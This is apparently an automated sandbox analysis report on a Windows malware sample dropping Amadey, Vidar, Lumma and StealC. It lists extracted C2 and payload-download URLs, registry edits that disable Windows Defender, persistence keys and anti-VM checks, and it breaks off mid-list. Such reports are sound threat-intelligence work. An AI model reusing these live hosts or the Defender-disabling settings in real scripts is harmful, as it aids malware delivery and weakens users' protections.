Analysis
-
max time kernel
143s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
29/03/2025, 12:51
Static task
static1
Behavioral task
behavioral1
Sample
2025-03-29_5ec95a42b16d80c72d17cc6d0bac58de_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
2025-03-29_5ec95a42b16d80c72d17cc6d0bac58de_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Resource
win10v2004-20250314-en
General
-
Target
2025-03-29_5ec95a42b16d80c72d17cc6d0bac58de_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
-
Size
938KB
-
MD5
5ec95a42b16d80c72d17cc6d0bac58de
-
SHA1
9cfd9221606e1acfef1ea5f6f4bf88080822d5db
-
SHA256
f3d7546937b4791736e3f2182526a0ac22d47060cce53c4ab8e439b65742127b
-
SHA512
ca64237e9b54295b3162e26808d6c9acbef0640a996534425e21898b456e5117142bfe4d30473d2573ef42d08f0a85475d1cab63153e7b1b573011f67f735f0b
-
SSDEEP
24576:dqDEvCTbMWu7rQYlBQcBiT6rprG8a0Xu:dTvC/MTQYxsWR7a0X
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
vidar
13.3
11373d37b176b52c098f600f61cdf190
https://t.me/lw25chm
https://steamcommunity.com/profiles/76561199839170361
-
user_agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0
Extracted
lumma
https://wxayfarer.live/ALosnz
https://oreheatq.live/gsopp
https://xcastmaxw.run/ganzde
https://weldorae.digital/geds
https://steelixr.live/aguiz
https://advennture.top/GKsiio
https://7targett.top/dsANGt
https://smeltingt.run/giiaus
https://ferromny.digital/gwpd
https://esccapewz.run/ANSbwqy
https://travewlio.shop/ZNxbHi
https://touvrlane.bet/ASKwjq
https://sighbtseeing.shop/ASJnzh
https://targett.top/dsANGt
https://holidamyup.today/AOzkns
https://mtriplooqp.world/APowko
https://castmaxw.run/ganzde
https://fferromny.digital/gwpd
Extracted
stealc
trump
http://45.93.20.28
-
url_path
/85a1cacf11314eb8.php
Signatures
-
Amadey family
-
Detect Vidar Stealer 17 IoCs
resource yara_rule behavioral2/memory/3648-237-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/3648-236-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/3648-254-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/3648-255-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/3648-260-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/3648-261-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/3648-264-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/3648-287-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/3648-288-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/3648-295-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/3648-299-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/3648-303-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/3648-990-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/3648-1037-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/3648-1038-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/3648-1148-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/3648-1144-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 -
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral2/memory/3564-21694-0x00000000009E0000-0x0000000000E20000-memory.dmp healer behavioral2/memory/3564-21704-0x00000000009E0000-0x0000000000E20000-memory.dmp healer behavioral2/memory/3564-22050-0x00000000009E0000-0x0000000000E20000-memory.dmp healer -
Gcleaner family
-
Healer family
-
Lumma family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" c96dd9ec4b.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" c96dd9ec4b.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection c96dd9ec4b.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" c96dd9ec4b.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" c96dd9ec4b.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" c96dd9ec4b.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" c96dd9ec4b.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" c96dd9ec4b.exe -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications c96dd9ec4b.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" c96dd9ec4b.exe -
Stealc family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 2432 created 2956 2432 MSBuild.exe 50 -
Vidar family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 16 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Temp6NRHSSS1VQ8FZDJWUAUPHQFA0ZYIWETW.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ c96dd9ec4b.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ f4619e3a66.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempETFFIRZNMFMBR1CERXWT5MBORYKTYXSS.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ c4f793a08b.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 5c08298338.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ c606d285b9.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 02a203a317.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ e6e32e2403.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 04c5e61d92.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ cdf48d376b.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe -
Blocklisted process makes network request 3 IoCs
flow pid Process 16 3760 powershell.exe 196 5824 powershell.exe 200 1676 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 5580 powershell.exe 13268 powershell.exe 7056 powershell.exe 6072 powershell.exe 5824 powershell.exe 1676 powershell.exe 3760 powershell.exe -
Downloads MZ/PE file 14 IoCs
flow pid Process 38 668 rapes.exe 38 668 rapes.exe 38 668 rapes.exe 38 668 rapes.exe 38 668 rapes.exe 38 668 rapes.exe 40 4192 futors.exe 604 10612 e6e32e2403.exe 604 10612 e6e32e2403.exe 604 10612 e6e32e2403.exe 16 3760 powershell.exe 35 668 rapes.exe 136 668 rapes.exe 143 4904 svchost.exe -
Drops file in Drivers directory 3 IoCs
description ioc Process File created C:\Windows\System32\Drivers\9e186137.sys 46e716e8.exe File created C:\Windows\System32\Drivers\klupd_9e186137a_arkmon.sys 46e716e8.exe File created C:\Windows\System32\Drivers\klupd_9e186137a_klbg.sys 46e716e8.exe -
Sets service image path in registry 2 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_9e186137a_mark\ImagePath = "System32\\Drivers\\klupd_9e186137a_mark.sys" 46e716e8.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_9e186137a_arkmon_7C924DD4\ImagePath = "\\??\\C:\\KVRT2020_Data\\Temp\\7C924DD4D20055C80007791130E2D03F\\klupd_9e186137a_arkmon.sys" 46e716e8.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\9e186137\ImagePath = "System32\\Drivers\\9e186137.sys" 46e716e8.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_9e186137a_arkmon\ImagePath = "System32\\Drivers\\klupd_9e186137a_arkmon.sys" 46e716e8.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_9e186137a_klbg\ImagePath = "System32\\Drivers\\klupd_9e186137a_klbg.sys" 46e716e8.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_9e186137a_klark\ImagePath = "System32\\Drivers\\klupd_9e186137a_klark.sys" 46e716e8.exe -
Uses browser remote debugging 2 TTPs 16 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 6132 chrome.exe 440 msedge.exe 7288 chrome.exe 9460 chrome.exe 12944 msedge.exe 5104 chrome.exe 1760 chrome.exe 4720 chrome.exe 7328 chrome.exe 8312 chrome.exe 13232 msedge.exe 4024 chrome.exe 6104 msedge.exe 12256 chrome.exe 13024 msedge.exe 5864 msedge.exe -
Checks BIOS information in registry 2 TTPs 32 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion c606d285b9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 04c5e61d92.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 02a203a317.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempETFFIRZNMFMBR1CERXWT5MBORYKTYXSS.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion c606d285b9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Temp6NRHSSS1VQ8FZDJWUAUPHQFA0ZYIWETW.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion f4619e3a66.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5c08298338.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion c96dd9ec4b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Temp6NRHSSS1VQ8FZDJWUAUPHQFA0ZYIWETW.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion f4619e3a66.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5c08298338.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempETFFIRZNMFMBR1CERXWT5MBORYKTYXSS.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 02a203a317.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion cdf48d376b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion cdf48d376b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion c4f793a08b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 04c5e61d92.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion e6e32e2403.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion e6e32e2403.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion c96dd9ec4b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion c4f793a08b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe -
Checks computer location settings 2 TTPs 8 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation futors.exe Key value queried \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation rapes.exe Key value queried \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation amnew.exe Key value queried \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation 7IIl2eE.exe Key value queried \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation Temp6NRHSSS1VQ8FZDJWUAUPHQFA0ZYIWETW.EXE -
Deletes itself 1 IoCs
pid Process 3632 w32tm.exe -
Executes dropped EXE 39 IoCs
pid Process 1896 Temp6NRHSSS1VQ8FZDJWUAUPHQFA0ZYIWETW.EXE 668 rapes.exe 4244 amnew.exe 4192 futors.exe 5900 f4619e3a66.exe 1572 5c08298338.exe 4168 rapes.exe 6040 futors.exe 4396 Rm3cVPI.exe 1944 svchost015.exe 3628 svchost015.exe 5096 c606d285b9.exe 5568 04c5e61d92.exe 4400 svchost015.exe 2816 TbV75ZR.exe 4772 hYjiwV0.exe 2904 EPTwCQd.exe 1000 7IIl2eE.exe 4856 Passwords.com 5008 u75a1_003.exe 3632 w32tm.exe 5312 tzutil.exe 5724 62b36023a0.exe 7420 TempETFFIRZNMFMBR1CERXWT5MBORYKTYXSS.EXE 7476 483d2fa8a0d53818306efeb32d3.exe 6168 627d431241.exe 8184 rapes.exe 3164 futors.exe 9172 02a203a317.exe 10056 cdf48d376b.exe 10612 e6e32e2403.exe 10984 b2e2ac1.exe 11784 46e716e8.exe 9620 1204b818ae.exe 3564 c96dd9ec4b.exe 9476 c4f793a08b.exe 8804 svchost015.exe 11636 rapes.exe 11680 futors.exe -
Identifies Wine through registry keys 2 TTPs 16 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Wine cdf48d376b.exe Key opened \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Wine e6e32e2403.exe Key opened \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Wine c96dd9ec4b.exe Key opened \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Wine 5c08298338.exe Key opened \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Wine TempETFFIRZNMFMBR1CERXWT5MBORYKTYXSS.EXE Key opened \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Wine f4619e3a66.exe Key opened \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Wine c4f793a08b.exe Key opened \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Wine 02a203a317.exe Key opened \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Wine Temp6NRHSSS1VQ8FZDJWUAUPHQFA0ZYIWETW.EXE Key opened \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Wine c606d285b9.exe Key opened \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Wine 04c5e61d92.exe Key opened \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Wine rapes.exe -
Impair Defenses: Safe Mode Boot 1 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\9e186137.sys 46e716e8.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\9e186137.sys\ = "Driver" 46e716e8.exe -
Loads dropped DLL 26 IoCs
pid Process 11784 46e716e8.exe 11784 46e716e8.exe 11784 46e716e8.exe 11784 46e716e8.exe 11784 46e716e8.exe 11784 46e716e8.exe 11784 46e716e8.exe 11784 46e716e8.exe 11784 46e716e8.exe 11784 46e716e8.exe 11784 46e716e8.exe 11784 46e716e8.exe 11784 46e716e8.exe 11784 46e716e8.exe 11784 46e716e8.exe 11784 46e716e8.exe 11784 46e716e8.exe 11784 46e716e8.exe 11784 46e716e8.exe 11784 46e716e8.exe 11784 46e716e8.exe 11784 46e716e8.exe 11784 46e716e8.exe 11784 46e716e8.exe 11784 46e716e8.exe 11784 46e716e8.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features c96dd9ec4b.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" c96dd9ec4b.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 11 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\04c5e61d92.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10043960101\\04c5e61d92.exe" futors.exe Set value (str) \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\62b36023a0.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10369180101\\62b36023a0.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cdf48d376b.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10369220101\\cdf48d376b.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\e6e32e2403.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10369230101\\e6e32e2403.exe" rapes.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\37f4cc3d-f27b-420b-957e-f6d811ab123d = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\{3c976390-0aa9-4094-8a98-6f7106a2b202}\\37f4cc3d-f27b-420b-957e-f6d811ab123d.cmd\"" 46e716e8.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10369190121\\am_no.cmd" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\1204b818ae.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10369240101\\1204b818ae.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\c96dd9ec4b.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10369250101\\c96dd9ec4b.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\5c08298338.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10043950101\\5c08298338.exe" futors.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops desktop.ini file(s) 3 IoCs
description ioc Process File opened for modification C:\Users\Admin\Documents\desktop.ini firefox.exe File opened for modification C:\Users\Public\desktop.ini firefox.exe File opened for modification C:\Users\Public\Documents\desktop.ini firefox.exe -
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\F: 46e716e8.exe -
Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PHYSICALDRIVE0 c606d285b9.exe File opened for modification \??\PhysicalDrive0 46e716e8.exe -
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x0007000000024408-1666.dat autoit_exe behavioral2/files/0x00020000000227b1-20983.dat autoit_exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
pid Process 4748 tasklist.exe 1708 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 16 IoCs
pid Process 1896 Temp6NRHSSS1VQ8FZDJWUAUPHQFA0ZYIWETW.EXE 668 rapes.exe 5900 f4619e3a66.exe 1572 5c08298338.exe 4168 rapes.exe 5096 c606d285b9.exe 5568 04c5e61d92.exe 7420 TempETFFIRZNMFMBR1CERXWT5MBORYKTYXSS.EXE 7476 483d2fa8a0d53818306efeb32d3.exe 8184 rapes.exe 9172 02a203a317.exe 10056 cdf48d376b.exe 10612 e6e32e2403.exe 3564 c96dd9ec4b.exe 9476 c4f793a08b.exe 11636 rapes.exe -
Suspicious use of SetThreadContext 8 IoCs
description pid Process procid_target PID 5900 set thread context of 1944 5900 f4619e3a66.exe 112 PID 1572 set thread context of 3628 1572 5c08298338.exe 113 PID 5568 set thread context of 4400 5568 04c5e61d92.exe 120 PID 2816 set thread context of 2432 2816 TbV75ZR.exe 123 PID 4772 set thread context of 3648 4772 hYjiwV0.exe 133 PID 2904 set thread context of 5900 2904 EPTwCQd.exe 135 PID 6168 set thread context of 5204 6168 627d431241.exe 215 PID 9476 set thread context of 8804 9476 c4f793a08b.exe 280 -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description ioc Process File opened (read-only) \??\VBoxMiniRdrDN b2e2ac1.exe File opened (read-only) \??\VBoxMiniRdrDN 46e716e8.exe -
Drops file in Windows directory 15 IoCs
description ioc Process File opened for modification C:\Windows\LogisticsNotre 7IIl2eE.exe File opened for modification C:\Windows\WallpapersHo 7IIl2eE.exe File opened for modification C:\Windows\JenniferSubdivision 7IIl2eE.exe File opened for modification C:\Windows\BrandonStat 7IIl2eE.exe File opened for modification C:\Windows\PotteryUser 7IIl2eE.exe File created C:\Windows\Tasks\rapes.job Temp6NRHSSS1VQ8FZDJWUAUPHQFA0ZYIWETW.EXE File opened for modification C:\Windows\ProvidingMilwaukee 7IIl2eE.exe File opened for modification C:\Windows\EstateLegislative 7IIl2eE.exe File opened for modification C:\Windows\CorrectionsGeographic 7IIl2eE.exe File opened for modification C:\Windows\RowTopics 7IIl2eE.exe File opened for modification C:\Windows\SpecificsHeaven 7IIl2eE.exe File opened for modification C:\Windows\DiscussedFacial 7IIl2eE.exe File opened for modification C:\Windows\EnglandDeleted 7IIl2eE.exe File opened for modification C:\Windows\GentleLogging 7IIl2eE.exe File created C:\Windows\Tasks\futors.job amnew.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 5704 2432 WerFault.exe 123 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rm3cVPI.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost015.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e6e32e2403.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 46e716e8.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Temp6NRHSSS1VQ8FZDJWUAUPHQFA0ZYIWETW.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language b2e2ac1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language c96dd9ec4b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 